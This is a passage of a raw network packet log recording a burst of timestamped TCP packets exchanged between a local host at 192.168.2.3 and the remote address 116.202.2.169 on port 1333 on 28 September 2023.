                                                                                              Sep 28, 2023 06:02:00.249980927 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.250009060 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.250088930 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.250147104 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.250643969 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.250698090 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.250783920 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.250838041 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.250969887 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.251020908 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.251141071 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.251198053 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.251301050 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.251355886 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.251483917 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.251543045 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.251638889 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.251677990 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.251699924 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.251718044 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.251810074 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.251846075 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.251868010 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.251884937 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.251898050 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.251934052 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.251986027 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.252034903 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.252167940 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.252209902 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.252230883 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.252250910 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.252311945 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.252348900 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.252361059 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.252399921 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.252497911 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.252554893 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.252685070 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.252744913 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.252849102 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.252887011 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.252906084 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.252932072 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.253015995 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.253051996 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.253067970 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.253094912 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.253175020 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.253215075 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.253230095 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.253252029 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.253256083 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.253293037 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.253354073 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.253390074 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.253402948 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.253431082 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.253521919 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.253576040 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.253670931 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.253711939 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.253726959 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.253752947 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.253837109 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.253887892 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.253973961 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254009962 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254028082 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254050016 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254149914 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254190922 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254205942 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254228115 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254231930 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254277945 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254331112 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254368067 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254388094 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254405022 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254407883 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254447937 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254465103 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254501104 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254507065 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254537106 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254542112 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254576921 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254581928 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254612923 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254618883 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254648924 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254653931 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254684925 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254688025 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254720926 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254726887 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254759073 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254764080 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254795074 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254801035 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254829884 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254836082 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254865885 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254870892 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254900932 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254906893 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254940033 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254944086 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.254977942 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.254981995 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255013943 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255018950 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255052090 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255053997 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255088091 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255099058 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255124092 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255129099 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255160093 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255167007 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255197048 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255202055 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255233049 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255238056 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255269051 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255275011 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255305052 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255312920 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255342007 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255343914 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255379915 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255383015 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255415916 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255417109 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255453110 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255459070 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255489111 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255495071 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255526066 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255531073 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255565882 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255572081 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255600929 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255606890 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255636930 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255641937 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255671978 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255677938 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255707979 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255712986 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255745888 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255749941 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255781889 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255789995 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255817890 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255824089 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255852938 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255857944 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255888939 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255899906 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255927086 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255937099 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.255964041 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.255974054 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256000996 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256011009 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256036997 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256050110 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256072998 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256083965 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256109953 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256119013 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256148100 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256184101 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256216049 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256216049 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256218910 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256231070 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256256104 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256275892 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256290913 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256314039 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256383896 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256398916 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256422043 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256439924 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256458044 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256485939 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256493092 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256506920 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256541967 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256603956 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256640911 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256649971 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256680965 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256688118 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256716967 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256730080 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256753922 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256766081 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256789923 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256814957 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256825924 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256844997 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256866932 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256882906 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256902933 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256913900 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256939888 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256949902 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.256975889 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.256987095 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257013083 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257021904 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257050991 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257062912 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257087946 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257097006 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257122993 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257134914 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257159948 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257169962 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257195950 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257205009 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257235050 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257246017 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257272005 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257282972 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257308006 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257318974 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257344007 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257354021 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257380962 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257390022 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257421017 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257430077 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257460117 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257472038 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257497072 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257508039 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257533073 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257543087 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257570982 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257580042 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257606030 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257618904 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257644892 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257654905 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257680893 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257699966 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257723093 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257731915 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257759094 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257771015 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257795095 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257808924 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257833958 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257844925 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257870913 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257882118 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257908106 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257917881 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257946014 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257957935 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.257982016 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.257993937 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258021116 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258033037 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258059025 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258071899 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258095026 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258106947 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258131981 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258143902 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258167982 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258179903 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258205891 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258215904 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258241892 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258254051 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258279085 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258290052 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258315086 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258327007 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258352041 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258363008 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258388042 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258404970 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258425951 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258439064 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258476973 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258481979 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258522034 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258533001 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258558035 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258570910 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258594990 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258605003 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258636951 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258651018 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258675098 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258687973 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258712053 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258723974 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258749008 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258759975 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258785009 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258797884 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258821011 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258832932 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258857012 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258869886 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258893967 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258905888 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258930922 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258941889 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.258966923 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.258979082 CEST498101333192.168.2.3116.202.2.169
